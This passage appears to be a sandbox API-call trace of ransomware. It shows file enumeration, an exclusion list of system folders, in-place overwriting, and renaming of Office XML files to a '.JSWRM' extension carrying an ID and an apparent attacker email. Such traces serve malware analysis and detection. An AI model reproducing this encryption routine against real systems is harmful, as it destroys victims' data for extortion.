lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1bc0, lpOverlapped=0x0) returned 1 [0139.152] CloseHandle (hObject=0x238) returned 1 [0139.153] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN010.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn010.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN010.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn010.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.154] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d5a1d84, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d5a1d84, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d5c7ff6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe2d8, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN011.XML", cAlternateFileName="")) returned 1 [0139.154] lstrcmpiW (lpString1="PGMN011.XML", lpString2=".") returned 1 [0139.154] lstrcmpiW (lpString1="PGMN011.XML", lpString2="..") returned 1 [0139.154] lstrcmpiW (lpString1="PGMN011.XML", lpString2="...") returned 1 [0139.154] lstrcmpiW (lpString1="PGMN011.XML", lpString2="windows") returned -1 [0139.154] lstrcmpiW (lpString1="PGMN011.XML", lpString2="recovery") returned -1 [0139.154] lstrcmpiW (lpString1="PGMN011.XML", lpString2="perflogs") returned 1 [0139.154] lstrcmpiW (lpString1="PGMN011.XML", lpString2="documents and settings") returned 1 [0139.154] lstrcmpiW (lpString1="PGMN011.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.155] lstrcmpiW (lpString1="PGMN011.XML", lpString2="system volume information") returned -1 [0139.155] lstrcmpiW (lpString1="PGMN011.XML", lpString2="msocache") returned 1 [0139.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN011.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN011.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN011.XML", lpUsedDefaultChar=0x0) returned 11 [0139.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN011.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN011.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN011.XML", lpUsedDefaultChar=0x0) returned 11 [0139.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN011.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn011.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.156] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=58072) returned 1 [0139.156] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.156] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xe2d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xe2d0, lpOverlapped=0x0) returned 1 [0139.160] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.160] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xe2d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xe2d0, lpOverlapped=0x0) returned 1 [0139.161] CloseHandle (hObject=0x238) returned 1 [0139.161] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN011.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn011.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN011.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn011.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.163] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d5a1d84, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d5a1d84, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d5c7ff6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2936, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN020.XML", cAlternateFileName="")) returned 1 [0139.163] lstrcmpiW (lpString1="PGMN020.XML", lpString2=".") returned 1 [0139.163] lstrcmpiW (lpString1="PGMN020.XML", lpString2="..") returned 1 [0139.163] lstrcmpiW (lpString1="PGMN020.XML", lpString2="...") returned 1 [0139.163] lstrcmpiW (lpString1="PGMN020.XML", lpString2="windows") returned -1 [0139.163] lstrcmpiW (lpString1="PGMN020.XML", lpString2="recovery") returned -1 [0139.163] lstrcmpiW (lpString1="PGMN020.XML", lpString2="perflogs") returned 1 [0139.163] lstrcmpiW (lpString1="PGMN020.XML", lpString2="documents and settings") returned 1 [0139.163] lstrcmpiW (lpString1="PGMN020.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.163] lstrcmpiW (lpString1="PGMN020.XML", lpString2="system volume information") returned -1 [0139.163] lstrcmpiW (lpString1="PGMN020.XML", lpString2="msocache") returned 1 [0139.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN020.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN020.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN020.XML", lpUsedDefaultChar=0x0) returned 11 [0139.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN020.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN020.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN020.XML", lpUsedDefaultChar=0x0) returned 11 [0139.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.163] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN020.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn020.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.164] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10550) returned 1 [0139.164] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.164] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2930, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2930, lpOverlapped=0x0) returned 1 [0139.168] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.168] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2930, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2930, lpOverlapped=0x0) returned 1 [0139.168] CloseHandle (hObject=0x238) returned 1 [0139.168] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN020.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn020.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN020.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn020.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.169] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d7457f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d7457f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d7b7e3f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x167d4, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN022.XML", cAlternateFileName="")) returned 1 [0139.169] lstrcmpiW (lpString1="PGMN022.XML", lpString2=".") returned 1 [0139.169] lstrcmpiW (lpString1="PGMN022.XML", lpString2="..") returned 1 [0139.170] lstrcmpiW (lpString1="PGMN022.XML", lpString2="...") returned 1 [0139.170] lstrcmpiW (lpString1="PGMN022.XML", lpString2="windows") returned -1 [0139.170] lstrcmpiW (lpString1="PGMN022.XML", lpString2="recovery") returned -1 [0139.170] lstrcmpiW (lpString1="PGMN022.XML", lpString2="perflogs") returned 1 [0139.170] lstrcmpiW (lpString1="PGMN022.XML", lpString2="documents and settings") returned 1 [0139.170] lstrcmpiW (lpString1="PGMN022.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.170] lstrcmpiW (lpString1="PGMN022.XML", lpString2="system volume information") returned -1 [0139.170] lstrcmpiW (lpString1="PGMN022.XML", lpString2="msocache") returned 1 [0139.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN022.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN022.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN022.XML", lpUsedDefaultChar=0x0) returned 11 [0139.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN022.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN022.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN022.XML", lpUsedDefaultChar=0x0) returned 11 [0139.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN022.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn022.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.172] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=92116) returned 1 [0139.172] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.172] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x167d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x167d0, lpOverlapped=0x0) returned 1 [0139.182] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.182] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x167d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x167d0, lpOverlapped=0x0) returned 1 [0139.182] CloseHandle (hObject=0x238) returned 1 [0139.182] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN022.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn022.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN022.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn022.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.183] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d5ee242, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d5ee242, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d7457f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x21be, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN026.XML", cAlternateFileName="")) returned 1 [0139.183] lstrcmpiW (lpString1="PGMN026.XML", lpString2=".") returned 1 [0139.183] lstrcmpiW (lpString1="PGMN026.XML", lpString2="..") returned 1 [0139.183] lstrcmpiW (lpString1="PGMN026.XML", lpString2="...") returned 1 [0139.183] lstrcmpiW (lpString1="PGMN026.XML", lpString2="windows") returned -1 [0139.184] lstrcmpiW (lpString1="PGMN026.XML", lpString2="recovery") returned -1 [0139.184] lstrcmpiW (lpString1="PGMN026.XML", lpString2="perflogs") returned 1 [0139.184] lstrcmpiW (lpString1="PGMN026.XML", lpString2="documents and settings") returned 1 [0139.184] lstrcmpiW (lpString1="PGMN026.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.184] lstrcmpiW (lpString1="PGMN026.XML", lpString2="system volume information") returned -1 [0139.184] lstrcmpiW (lpString1="PGMN026.XML", lpString2="msocache") returned 1 [0139.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN026.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN026.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN026.XML", lpUsedDefaultChar=0x0) returned 11 [0139.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN026.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN026.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN026.XML", lpUsedDefaultChar=0x0) returned 11 [0139.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN026.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn026.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.185] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8638) returned 1 [0139.185] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.185] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x21b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x21b0, lpOverlapped=0x0) returned 1 [0139.187] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.188] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x21b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x21b0, lpOverlapped=0x0) returned 1 [0139.188] CloseHandle (hObject=0x238) returned 1 [0139.188] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN026.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn026.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN026.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn026.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.189] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d5ee242, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d5ee242, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d5ee242, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN027.XML", cAlternateFileName="")) returned 1 [0139.189] lstrcmpiW (lpString1="PGMN027.XML", lpString2=".") returned 1 [0139.189] lstrcmpiW (lpString1="PGMN027.XML", lpString2="..") returned 1 [0139.189] lstrcmpiW (lpString1="PGMN027.XML", lpString2="...") returned 1 [0139.189] lstrcmpiW (lpString1="PGMN027.XML", lpString2="windows") returned -1 [0139.189] lstrcmpiW (lpString1="PGMN027.XML", lpString2="recovery") returned -1 [0139.189] lstrcmpiW (lpString1="PGMN027.XML", lpString2="perflogs") returned 1 [0139.189] lstrcmpiW (lpString1="PGMN027.XML", lpString2="documents and settings") returned 1 [0139.189] lstrcmpiW (lpString1="PGMN027.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.189] lstrcmpiW (lpString1="PGMN027.XML", lpString2="system volume information") returned -1 [0139.189] lstrcmpiW (lpString1="PGMN027.XML", lpString2="msocache") returned 1 [0139.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN027.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN027.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN027.XML", lpUsedDefaultChar=0x0) returned 11 [0139.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN027.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN027.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN027.XML", lpUsedDefaultChar=0x0) returned 11 [0139.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN027.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn027.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.190] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2362) returned 1 [0139.190] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.190] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x930, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x930, lpOverlapped=0x0) returned 1 [0139.192] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.192] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x930, lpOverlapped=0x0) returned 1 [0139.192] CloseHandle (hObject=0x238) returned 1 [0139.193] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN027.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn027.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN027.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn027.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.193] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d5c7ff6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d5c7ff6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d7457f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1412, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN044.XML", cAlternateFileName="")) returned 1 [0139.194] lstrcmpiW (lpString1="PGMN044.XML", lpString2=".") returned 1 [0139.194] lstrcmpiW (lpString1="PGMN044.XML", lpString2="..") returned 1 [0139.194] lstrcmpiW (lpString1="PGMN044.XML", lpString2="...") returned 1 [0139.194] lstrcmpiW (lpString1="PGMN044.XML", lpString2="windows") returned -1 [0139.194] lstrcmpiW (lpString1="PGMN044.XML", lpString2="recovery") returned -1 [0139.194] lstrcmpiW (lpString1="PGMN044.XML", lpString2="perflogs") returned 1 [0139.194] lstrcmpiW (lpString1="PGMN044.XML", lpString2="documents and settings") returned 1 [0139.194] lstrcmpiW (lpString1="PGMN044.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.194] lstrcmpiW (lpString1="PGMN044.XML", lpString2="system volume information") returned -1 [0139.194] lstrcmpiW (lpString1="PGMN044.XML", lpString2="msocache") returned 1 [0139.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 